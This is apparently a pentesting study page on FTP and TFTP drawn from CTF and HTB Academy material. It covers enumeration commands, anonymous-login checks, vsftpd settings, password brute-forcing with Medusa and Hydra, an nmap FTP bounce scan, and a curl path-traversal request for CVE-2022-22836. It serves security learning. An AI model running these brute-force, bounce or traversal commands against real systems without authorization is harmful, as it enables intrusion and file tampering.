# FTP > *Source CTF and HTB Academy* * Usually on port 21 The File Transfer Protocol (FTP) is one of the oldest protocols on the Internet. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP. These protocols also work with the support of browsers or email clients to perform their services. There are also special FTP programs for the File Transfer Protocol. ## Footprinting * `find / -type f -name ftp* 2>/dev/null | grep scripts` find all the nmap scripts for ftp and choose the ones you wish to use * `sudo nmap -sV -p21 -sC -A 10.129.14.136` * `nc -nv 10.129.14.136 21` * `telnet 10.129.14.136 21` * `openssl s_client -connect 10.129.14.136:21 -starttls ftp` ## What to try * Check if anonymous FTP is enabled, if so check if you can downloads files. If so you can RCE.\ Check out [Hackthebox Devel's writeup](https://csbygb.gitbook.io/pentips/writeups/htbwriteups/htb-devel) to have an example of this. * If you do not have write access you could still find interesting and useful files like passwords or else. ## vsftpd One of the most used FTP servers on Linux-based distributions is [vsFTPd](https://security.appspot.com/vsftpd.html). * `sudo apt install vsftpd` install it * `cat /etc/vsftpd.conf | grep -v "#"` interesting config to check * `cat /etc/ftpusers` file used to deny certain users access to the FTP service ### Config for anonymous login | Setting | Description | | ------------------------------ | ---------------------------------------------------------------------------------- | | anonymous\_enable=YES | Allowing anonymous login? | | anon\_upload\_enable=YES | Allowing anonymous to upload files? | | anon\_mkdir\_write\_enable=YES | Allowing anonymous to create new directories? | | no\_anon\_password=YES | Do not ask anonymous for password? | | anon\_root=/home/username/ftp | Directory for anonymous. | | write\_enable=YES | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? | ### Anonymous login * `ftp ` you will need to specify the port in case it is not port 21 if it is 21 you do not need to specify ## Download ftp files * `wget -m --no-passive ftp://username:password@IP:2121 --starttls ftp` * `wget ftp://username:password@ftp_server_address/path/to/file` ## lftp * [lftp man page](https://lftp.yar.ru/lftp-man.html) * `sudo apt install lftp` * `lftp -p 2121 -u anonymous, 10.10.10.10` ## Interesting commands * `status` will show configurations * `debug` * `trace` * `ls -R` list file recursively * `get filename` download a file * `put filename` upload a file * `wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136` Downaload all available files * `tree .` inspect all files downloaded * Upload a file * `touch file` create a file * `put file` put it in the ftp server * `PASV` enter [passive mode](https://support.solarwinds.com/SuccessCenter/s/article/PASV-FTP-command?language=en_US) * Do not forget `ls -al` (to see hidden files) | Setting | Description | | ------------------------ | -------------------------------------------------------------------------------- | | dirmessage\_enable=YES | Show a message when they first enter a new directory? | | chown\_uploads=YES | Change ownership of anonymously uploaded files? | | chown\_username=username | User who is given ownership of anonymously uploaded files. | | local\_enable=YES | Enable local users to login? | | chroot\_local\_user=YES | Place local users into their home directory? | | chroot\_list\_enable=YES | Use a list of local users that will be placed in their home directory? | | hide\_ids=YES | All user and group information in directory listings will be displayed as "ftp". | | ls\_recurse\_enable=YES | Allows the use of recurse listings. | ## TFTP Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes. However, it does not provide user authentication and other valuable features supported by FTP. In addition, while FTP uses TCP, TFTP uses UDP, making it an unreliable protocol and causing it to use UDP-assisted application layer recovery. | Commands | Description | | -------- | -------------------------------------------------------------------------------------------------------------------------------------- | | connect | Sets the remote host, and optionally the port, for file transfers. | | get | Transfers a file or set of files from the remote host to the local host. | | put | Transfers a file or set of files from the local host onto the remote host. | | quit | Exits tftp. | | status | Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on. | | verbose | Turns verbose mode, which displays additional information during file transfer, on or off. | ## Bruteforcing * [Medusa](https://github.com/jmk-foofus/medusa) ```bash medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp medusa -U users2.list -P pws.list -h 10.129.120.4 -M ftp -n 2121 ``` * [Hydra](https://github.com/vanhauser-thc/thc-hydra) ```bash hydra -l user -p password ftp://10.10.10.10 hydra -L user.list -P password.list ftp://10.10.10.10 ``` ## FTP Bounce Attack An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server. Consider we are targetting an FTP Server FTP\_DMZ exposed to the internet. Another device within the same network, Internal\_DMZ, is not exposed to the internet. We can use the connection to the FTP\_DMZ server to scan Internal\_DMZ using the FTP Bounce attack and obtain information about the server's open ports. Then, we can use that information as part of our attack against the infrastructure. ![FTP Bounce attack](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-3befd194f2a72bce80b14c6fe5c57c534a0885dc%2F2024-11-02-10-35-31.png?alt=media) > Source [GeeksforGeeks](https://www.geeksforgeeks.org/what-is-ftp-bounce-attack/) The Nmap -b flag can be used to perform an FTP bounce attack: ```bash nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2 ``` ## CVEs on FTP * [CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836)\ This vulnerability is for an FTP service that does not correctly process the HTTP PUT request and leads to an authenticated directory/path traversal, and arbitrary file write vulnerability. This vulnerability allows us to write files outside the directory to which the service has access.\ Exploitation ```bash curl -k -X PUT -H "Host: " --basic -u : --data-binary "PoC." --path-as-is https:///../../../../../../whoops ``` ## Resources {% embed url="" %} Pentesting FTP - Hacktricks {% endembed %} {% embed url="" %} The Ultimate FTP Commands list {% endembed %} {% embed url="" %} List of FTP server return codes {% endembed %} {% embed url="" %} Hackthebox Academy {% endembed %}